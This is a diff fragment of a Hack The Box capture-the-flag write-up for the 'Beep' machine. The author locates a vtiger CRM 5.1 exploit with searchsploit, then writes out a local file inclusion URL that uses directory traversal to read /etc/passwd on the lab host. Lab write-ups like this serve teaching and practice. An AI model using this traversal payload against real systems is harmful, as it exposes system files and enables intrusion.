theeldruin/Writeups/hackthebox/beep.md

 A lot of things to check, but i had never saw the folder vtigercrm, so i started with it
 ![alt text](./img/beep03.PNG?raw=true)

+We have the app version, so let's try to find some exploit to it
 searchsploit vtiger 5.1
 ![alt text](./img/beep04.PNG?raw=true)

 searchsploit -x php/webapps/18770.txt
 ![alt text](./img/beep05.PNG?raw=true)

-So let’s try to use this URL, only changing the LOCALHOST to 10.10.10.7
+It is vulnerable do LFI (Local File Inclusion)...so let’s try to use this URL, only changing the LOCALHOST to 10.10.10.7
 https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
 ![alt text](./img/beep06.PNG?raw=true)